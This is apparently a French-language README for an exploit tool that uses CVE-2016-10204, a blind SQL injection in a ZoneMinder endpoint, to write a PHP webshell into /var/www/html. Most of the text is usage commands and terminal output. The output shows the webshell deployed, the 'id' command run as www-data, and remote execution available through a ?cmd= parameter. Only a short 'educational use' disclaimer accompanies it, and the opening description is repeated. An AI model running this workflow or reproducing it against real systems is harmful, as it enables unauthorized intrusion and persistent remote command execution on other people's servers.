
Un script bash démontrant l'exploitation manuelle de CVE-2016-10204 contre un point de terminaison cible, conduisant au téléchargement d'un webshell php.
Un script bash démontrant l'exploitation manuelle de CVE-2016-10204 contre un point de terminaison cible, menant au téléchargement d'une webshell php.
Actuellement, la variable webshell est configurée pour une charge utile MySQL. Elle peut être remplacée par le backend que vous devez cibler.
Plus d'informations sur cette CVE peuvent être trouvées à ces sources :
Ce script fonctionne de plusieurs manières :
Utilisation :
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/chmod +x CVE-2016-10204_Webshell.sh
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh testme http://127.0.0.1/zm/index.php
Utilisation générale :
/bin/bash CVE-2016-10204_Webshell.sh <suffixe_url_webshell> <http://point_terminal_cible/zm/index.php>
Aide :
Exemple :
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
[+]================================[+]
[+]CVE-2016-10204 - Outil de Webshell SQLi Aveugle [+]
[+]Dépôt de l'auteur : https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
[*]================================[*]
[*]Hôte cible : 192.168.177.52:3305 [*]
[*]Point de terminaison cible : http://192.168.177.52:3305/zm/index.php [*]
[*]================================[*]
[*]================================[*]
[*]Tentative de déploiement de la webshell. [*]
[*]================================[*]
Warning: Binary output can mess up your terminal. Use "--output -" to tell curl to output it to your terminal anyway, or
Warning: consider "--output <FILE>" to save to a file.
Exit Code for Timeout: 23
[*]================================[*]
[*]Déploiement de la webshell réussi. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] L'exécution est disponible via le paramètre ?cmd= [*]
[*]================================[*]
Réexécution contre une cible déjà exploitée :
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
[+]================================[+]
[+]CVE-2016-10204 - Outil de Webshell SQLi Aveugle [+]
[+]Dépôt de l'auteur : https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
[*]================================[*]
[*]Hôte cible : 192.168.177.52:3305 [*]
[*]Point de terminaison cible : http://192.168.177.52:3305/zm/index.php [*]
[*]================================[*]
[*]================================[*]
[*]Webshell déjà déployée. [*]
[*]================================[*]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] http://192.168.177.52:3305/webshell_test.php?cmd=id [*]
[*] L'exécution est disponible via le paramètre ?cmd= [*]
[*]================================[*]
Aide incluse :
┌──(user㉿kali)-[~/Downloads]
└─$ /bin/bash CVE-2016-10204_Webshell.sh -h
[+]================================[+]
[+]CVE-2016-10204 - Outil de Webshell SQLi Aveugle [+]
[+]Dépôt de l'auteur : https://github.com/0xNullComet/CVE-2016-10204_Webshell [+]
[+]================================[+]
CVE-2016-10204_Webshell
Un script bash démontrant l'exploitation manuelle de CVE-2016-10204 contre un point de terminaison cible,
menant au téléchargement d'une webshell php.
Plus d'informations :
- https://nvd.nist.gov/vuln/detail/CVE-2016-10204
- https://www.exploit-db.com/exploits/41239
- https://www.openwall.com/lists/oss-security/2017/02/05/1
Utilisation :
/bin/bash CVE-2016-10204_Webshell.sh <suffixe_url_webshell> <http://cible/zm/index.php>
Exemple :
/bin/bash CVE-2016-10204_Webshell.sh test http://192.168.177.52:3305/zm/index.php
Notes :
- Vérifie si une webshell existe déjà avant de tenter l'exploitation.
- Construit une charge utile SQLi malveillante pour écrire une webshell PHP dans /var/www/html.
- Confirme le déploiement en exécutant 'id' via le paramètre ?cmd=.
- Veuillez utiliser de manière responsable uniquement contre des appareils pour lesquels vous avez l'autorisation. Ceci est à des fins éducatives uniquement.